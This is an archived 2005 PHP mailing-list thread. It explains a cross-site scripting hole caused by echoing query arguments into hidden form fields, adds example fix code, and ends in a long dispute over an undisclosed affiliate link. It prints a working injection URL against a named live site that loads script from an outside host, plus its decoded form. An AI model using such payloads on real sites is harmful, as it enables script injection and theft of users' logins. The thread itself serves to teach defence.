 PHP Classes - Free ready to use OOP components written in PHP
 http://www.phpclasses.org/
 
 PHP Reviews - Reviews of PHP books and other products
 http://www.phpclasses.org/reviews/
 
 Metastorage - Data object relational mapping layer generator
 http://www.meta-language.net/metastorage.html
 
 --
 PHP General Mailing List (http://www.php.net/)
 To unsubscribe, visit: http://www.php.net/unsub.php
 





RE: [PHP] Re: Free penetration test

2005-05-27 Thread Chris W. Parker
Rasmus Lerdorf mailto:[EMAIL PROTECTED]
on Friday, May 27, 2005 4:15 PM said:

 He was apparently doing something along the lines of:
 
   foreach($_GET as $key=>$val) {
     echo <<<EOL
 <input type="hidden" name="$key" value="$val">
 EOL;
   }
 
 Probably just a laziness thing.  Generally you will want to keep track
 of which query args are actually valid and not just parrot whatever
 you get back to the user.

Oh I see.

 Or if you are going to do it this way,
 recognize that you have to filter/encode both the query arg names and
 the values.

One question. (Because I'm a lame brain when it comes to security as I'm
not good at imagining how things can be exploited):

Is it bad to give field names the same name as their database
counterpart? i.e. In a database the first name column might be known as
'fname'. Should a form field called 'fname' NOT be created?


Chris.




Re: [PHP] Re: Free penetration test

2005-05-27 Thread Rasmus Lerdorf
Chris W. Parker wrote:
 One question. (Because I'm a lame brain when it comes to security as I'm
 not good at imagining how things can be exploited):
 
 Is it bad to give field names the same name as their database
 counterpart? i.e. In a database the first name column might be known as
 'fname'. Should a form field called 'fname' NOT be created?

As long as you recognize that you need to filter things appropriately it
doesn't really matter.  Application-level Web security is not that hard.
 There is just 1 rule to remember.  Never trust anything that comes from
the user.  That includes all GET, POST and Cookie data, which most
people understand.  But it also includes the User Agent, the Referer,
and even the Host header.  Anything that comes across the wire in the
request can be hacked.

If you have written something and you'd like me to take a quick look for
any obvious exploits, feel free to mail me privately.  If your site
requires a login, you can send me a test login if you want so I can dig
a bit deeper, otherwise I will still prod it from the outside.  I'm not
going to hack into your server in any way, just prod your web
application a little bit with various web requests.  Server-level
security is a completely different kettle of fish which mostly comes
down to keeping up to date with OS-level security updates.

So far about 80% of sites I have looked at have had pretty serious
issues.  Like that www.vlaamse-kern.com one where you could trick people
into sending you their usernames and passwords pretty easily.

-Rasmus




RE: [PHP] Re: Free penetration test

2005-05-27 Thread Chris W. Parker
Rasmus Lerdorf mailto:[EMAIL PROTECTED]
on Friday, May 27, 2005 11:58 AM said:

 You have all sorts of problems at that URL.  To start with, here is
 a cross-site scripting hack: 
 

http://www.vlaamse-kern.com/yourstore-0.0.2-beta1/admin/?%22%3E%3Cscript
%09
 src%3D%22http://3423329163/v

First of all, excellent example.

 Don't display arbitrary key names in hidden fields the way you are.

What do you mean by arbitrary key names?



Chris.




Re: [PHP] Re: Free penetration test

2005-05-27 Thread Rasmus Lerdorf
Chris W. Parker wrote:
 Rasmus Lerdorf mailto:[EMAIL PROTECTED]
 on Friday, May 27, 2005 11:58 AM said:
 
 
You have all sorts of problems at that URL.  To start with, here is
a cross-site scripting hack: 


 
 http://www.vlaamse-kern.com/yourstore-0.0.2-beta1/admin/?%22%3E%3Cscript
 %09
 
src%3D%22http://3423329163/v
 
 
 First of all, excellent example.
 
 
Don't display arbitrary key names in hidden fields the way you are.
 
 
 What do you mean by arbitrary key names?

He was apparently doing something along the lines of:

  foreach($_GET as $key=>$val) {
    echo <<<EOL
<input type="hidden" name="$key" value="$val">
EOL;
  }

Probably just a laziness thing.  Generally you will want to keep track
of which query args are actually valid and not just parrot whatever you
get back to the user.  Or if you are going to do it this way,
recognize that you have to filter/encode both the query arg names and
the values.

-Rasmus
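
The two fixes Rasmus describes above, shown next to the pattern he reconstructed, as an added example (not code from the thread or from Andy's application). The argument names `page` and `lang`, their patterns, the helper names and the sample input are assumptions made up for illustration.

```php
<?php
declare(strict_types=1);

// Hypothetical allow-list: the only query arguments this form carries
// forward, each with a validation pattern for its value.
const CARRIED_ARGS = [
    'page' => '/^[a-z0-9_-]{1,32}$/i',
    'lang' => '/^[a-z]{2}$/',
];

/** Encode a string for use inside a quoted HTML attribute. */
function attr(string $s): string
{
    return htmlspecialchars($s, ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8');
}

/** The pattern from the thread: every name and value is echoed back raw. */
function hiddenFieldsUnsafe(array $query): string
{
    $html = '';
    foreach ($query as $key => $val) {
        $html .= "<input type=\"hidden\" name=\"$key\" value=\"$val\">\n";
    }
    return $html;
}

/** Fix 1: carry forward only known arguments whose values validate. */
function hiddenFieldsAllowList(array $query): string
{
    $html = '';
    foreach (CARRIED_ARGS as $name => $pattern) {
        $val = $query[$name] ?? null;
        // Skip missing args, array-valued args (?page[]=x) and bad values.
        if (!is_string($val) || preg_match($pattern, $val) !== 1) {
            continue;
        }
        $html .= sprintf(
            "<input type=\"hidden\" name=\"%s\" value=\"%s\">\n",
            attr($name),
            attr($val)
        );
    }
    return $html;
}

/** Fix 2: echo everything, but encode both the name and the value. */
function hiddenFieldsEncoded(array $query): string
{
    $html = '';
    foreach ($query as $key => $val) {
        if (!is_string($val)) {
            continue; // nested arrays are not carried forward here
        }
        // Numeric-looking keys arrive as int, so cast before encoding.
        $html .= sprintf(
            "<input type=\"hidden\" name=\"%s\" value=\"%s\">\n",
            attr((string) $key),
            attr($val)
        );
    }
    return $html;
}

// Constructed sample standing in for $_GET: the first argument *name*
// carries markup, the second is a legitimate argument, the third is an
// unknown argument whose value tries to break out of the attribute.
$query = [
    '"><b>injected</b>' => 'x',
    'page'              => 'orders',
    'note'              => 'a"b<c>',
];

echo "--- unsafe: markup from the name lands in the page ---\n";
echo hiddenFieldsUnsafe($query);
echo "--- allow-list: only 'page' survives ---\n";
echo hiddenFieldsAllowList($query);
echo "--- encoded: all three kept, names and values inert ---\n";
echo hiddenFieldsEncoded($query);
```

Run with the PHP CLI and compare the three blocks: in the first, the `<b>` element from the argument name sits outside the `input` tag; in the other two no attacker-supplied character reaches the markup unencoded.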




Re: [PHP] Re: Free penetration test

2005-05-27 Thread Andy Pieters
On Saturday 28 May 2005 01:05, Chris W. Parker wrote:
 Rasmus Lerdorf mailto:[EMAIL PROTECTED]

 on Friday, May 27, 2005 11:58 AM said:
  You have all sorts of problems at that URL.  To start with, here is
  a cross-site scripting hack:

 http://www.vlaamse-kern.com/yourstore-0.0.2-beta1/admin/?%22%3E%3Cscript
 %09

  src%3D%22http://3423329163/v

 First of all, excellent example.

  Don't display arbitrary key names in hidden fields the way you are.

 What do you mean by arbitrary key names?

In this example, what was going on was that I captured the parameters passed 
on the url, and included them as hiddens in a form.

Since it was not properly escaped, the attack succeeds by inserting a variable 
with value
"> <script type="text/javascript" src="somewhere"></script>
But then url encoded:
%22%3E+%3Cscript+type%3D%09ext%2Fjavascript+src%3D%22somewhere%22%3E%3C%2Fscript%3E

Which translates in the html document to:

<form...>
<input type="hidden" name=""> <script type="text/javascript" 
src="somewhere"></script>
...


-- 
Registered Linux User Number 379093
-- --BEGIN GEEK CODE BLOCK-
Version: 3.1
GAT/O/E$ d-(---)+ s:(+): a--(-)? C$(+++) UL$ P-(+)++
L+++$ E---(-)@ W++$ !N@ o? !K? W--(---) !O !M- V-- PS++(+++)
PE--(-) Y+ PGP++(+++) t+(++) 5-- X++ R*(+)@ !tv b-() DI(+) D+(+++) G(+)
e$@ h++(*) r--++ y--()
-- ---END GEEK CODE BLOCK--
--
Check out these few php utilities that I released
 under the GPL2 and that are meant for use with a 
 php cli binary:
 
 http://www.vlaamse-kern.com/sas/
--

--




Re: [PHP] Re: Free penetration test

2005-05-27 Thread Ryan A
Hi,

  I have requested the free test several times and it was very useful
  because it brought my attention to aspects that I was not considering,
  some related to PHP in specific and other related to Internet in
general.

  fair enough, you could have given him the link to the page directly
  _without_ your affiliate add on code, but since you did tack your aff
  code on, I think you should have mentioned it

 That would be irrelevant because nothing changes for anybody that
 follows the link with or without the aff code. The service is still free
 and the service is the same.

Not really, the service is still the same... true,
but what happens if he decides to buy one more scan (49$) from that site or
decides to buy a 1 month scanning option ($119) or 1 year scanning ($899)?
Does a little birdie get 35% (recurring) of that?


  as you get 35% (minimum, for up to a year) if he signs up...not that
  anybody's bothered if you make money

 That is false. If he signs up and tries the free penetration test
 service that he asked and I suggested, I do not gain anything. Stop
 deceiving people!

My bad there, while typing the first email I meant if he signs up for a
paid plan instead I wrote if he signs up...



  If I ever gain anything with the referral, he would not be paying more
  for whatever services he would order.
  --
  Never said he would be paying extra,  but the point is you would be
  making money off him (not a bad thing again) without his knowledge (bad
  thing)...if he finds the link really useful I think to show his
  appreciation he would _make sure_ your affiliate link is tacked there..I
  would.

 Stop distorting the facts. You are implying that I am acting with malice by
 stating that I will make money by hiding facts when a) Andy never asked
 explicitly for a service that the referer would not gain anything b) I
 am not hiding anything as the affiliate id is quite visible in the URL
 c) I never denied that the URL contains my affiliate id.

You keep saying distorting the facts, which is quite strange because this
whole discussion
took a turn because you in a way distorted the facts by not telling the
person you were helping
that you may be making money off him without his knowledge.

Andy never asked explicitly for a service that the referer would not gain
anything
True, but if  want to play that game, he never mentioned that he was looking
for someone to mention a site/resource where the referrer was gaining OR not
gaining anything...which is kind of stupid because when we write to the list
we don't think we are making a deal with the devil so we have to cover all
points and angles. This is PHP (help) list, not a list on how to best write a
help email so it would hold up in a court of law-

I am not hiding anything as the affiliate id is quite visible in the URL
Unfortunately for you that's quite true...and that's how this whole thing
turned because I saw it, but many people (maybe Andy too) don't know what it
means when someone gives them a URL with an affiliate id tacked to the end of
it, common decency is to tell the person that you have a connection with that
site.

I never denied that the URL contains my affiliate id.
If you did you would be really stupid, and nobody is accusing you of
being that.


-
If I am acting with malice as you suggest just because I did not mention
that the URL contained my affiliate id, what would you say about the PHP
group that lists a pile of books in Amazon linked with their affiliate
id but they do not mention that fact anywhere in their pages?

http://www.php.net/books.php
--
Ummm. this is what's written on the page:
If you buy the book using the links on this page, you are helping to
support PHP development!
Lucky for me, English is my mother tongue but I think even if it wasn't and
my IQ was quite a bit lower I would still get the idea that if I buy a book
using one of those links the site was gaining from it.
Why? because they are being open, decent AND honest about it, see the
If you buy the book using the links ... you are helping to support
parts?

  Maybe I am Darth Vader and the PHP Group is the whole dark side of the
  force.
And you tell me I am being ridiculous!


clip
 Another example, I am an affiliate of interland, if someone asks about
 dedicated hosting I could send them there
 they would join, not pay a cent extra, but I get a commission *without
 their knowledge* (10% recurring)... am I helping them or myself?

Yeah, right, you are fighting the dark side of the force to be the good
guy that just lives from the air that you breath and nobody else should
be allowed to gain anything from referrals unless you warn users that
you refer that you are keeping a commission, despite the price is always
the same!?!
/clip

People on this list are some of the best people I have ever had the
privilege of helping and being helped by...they are not really out to sucker
anyone or for self gain..they help to help,
no 

Re: [PHP] Re: Free penetration test

2005-05-27 Thread Manuel Lemos

Hello,

on 05/27/2005 05:30 PM Rory Browne said the following:

You may want to try Security Space services. They perform many types of
security checks remotely including penetration tests that may reveal
serious vulnerabilities in your servers. Such vulnerabilities include
holes, in your server OS version, Web and e-mail servers and even in the
PHP version that you may have installed.

You can try their no risk test in this page that is free and in a few
minutes after the test is requested you get a full report by e-mail.

http://www.securityspace.com/smysecure/norisk_index.html?refid=1057382149

Umm, you forgot to mention that you are connected to that site and you get
a commission for sending them clients, if they sign up.

Nothing wrong with getting an affiliate buck mind you, I have a few
affiliate accounts around too,
but I (and others on the list i have noticed, Jay B for one) mention that we
are connected to / own
the websites we are sending the person to.

I did not forget to mention anything. Andy asked for a free penetration
test and that is exactly what he gets going to the page mentioned above.

We generally like to know however if there is potential bias in links
we are being given.


There is nothing to be concerned about any bias because a) I am 
recommending a free service that anybody can try and evaluate and post 
an opinion, b) I said I tried it, it does what the original poster asked 
and nobody has demonstrated otherwise, c) the link is in plain text so 
that everybody can see the referral id, so I am not hiding anything, if 
I had I would not be here clarifying the facts.


--

Regards,
Manuel Lemos

PHP Classes - Free ready to use OOP components written in PHP
http://www.phpclasses.org/

PHP Reviews - Reviews of PHP books and other products
http://www.phpclasses.org/reviews/

Metastorage - Data object relational mapping layer generator
http://www.meta-language.net/metastorage.html




Re: [PHP] Re: Free penetration test

2005-05-27 Thread Manuel Lemos

Hello,

on 05/27/2005 06:46 PM Ryan A said the following:

-
I have requested the free test several times and it was very useful
because it brought my attention to aspects that I was not considering,
some related to PHP in specific and other related to Internet in general.
-
fair enough, you could have given him the link to the page directly _without_
your affiliate add on code, but since you did tack your aff code on, I think
you should have mentioned it


That would be irrelevant because nothing changes for anybody that 
follows the link with or without the aff code. The service is still free 
and the service is the same.




as you get 35% (minimum, for up to a year) if he signs up...not that anybody's
bothered if you make money


That is false. If he signs up and tries the free penetration test 
service that he asked and I suggested, I do not gain anything. Stop 
deceiving people!




--
If I ever gain anything with the referral, he would not be paying more for
whatever services he would order.
--
Never said he would be paying extra,  but the point is you would be making
money off him (not a bad
thing again) without his knowledge (bad thing)...if he finds the link really
useful I think to show his appreciation he
would _make sure_ your affiliate link is tacked there..I would.


Stop distorting the facts. You are implying that I am acting with malice by 
stating that I will make money by hiding facts when a) Andy never asked 
explicitly for a service that the referer would not gain anything b) I 
am not hiding anything as the affiliate id is quite visible in the URL 
c) I never denied that the URL contains my affiliate id.


If I am acting with malice as you suggest just because I did not mention 
that the URL contained my affiliate id, what would you say about the PHP 
group that lists a pile of books in Amazon linked with their affiliate 
id but they do not mention that fact anywhere in their pages?


http://www.php.net/books.php

Maybe I am Darth Vader and the PHP Group is the whole dark side of the 
force. Get real, you are being ridiculous!




Another example, I am an affiliate of interland, if someone asks about
dedicated hosting I could send them there
they would join, not pay a cent extra, but I get a commission *without their
knowledge* (10% recurring)...
am I helping them or myself?


Yeah, right, you are fighting the dark side of the force to be the good 
guy that just lives from the air that you breath and nobody else should 
be allowed to gain anything from referrals unless you warn users that 
you refer that you are keeping a commission, despite the price is always 
the same!?!





-
So, I do not see your point in bugging me for this. If you feel that I
am not helping Andy, I would appreciate that you tell me that directly!
-
Well, all I can say is, if my little email bugged you, you either get bugged
very easily or you know I'm right!


Look, you challenged my credibility by distorting the facts. Of course 
that bugs me because for 8 years I have been participating in PHP 
mailing lists helping people leading to solutions to the problems that 
they pose, and your attitude is misleading people into believing that I 
am not helping them.


You have caused such confusion that Andy, the original poster, has 
written me privately telling that he thought that the link that I 
suggested pointed to a site of mine where I was selling security 
auditing services, when in fact the only person that was doing that in this 
thread was Chris Shiflett.


I just recommended a service that I tried, and so I have first hand 
experience to comment about, unlike you that not only just caused 
confusion but also did not offer any solution to the problem posed by 
Andy. Basically you are not helping because all you did is to bug 
somebody that tried to help.



--

Regards,
Manuel Lemos

PHP Classes - Free ready to use OOP components written in PHP
http://www.phpclasses.org/

PHP Reviews - Reviews of PHP books and other products
http://www.phpclasses.org/reviews/

Metastorage - Data object relational mapping layer generator
http://www.meta-language.net/metastorage.html
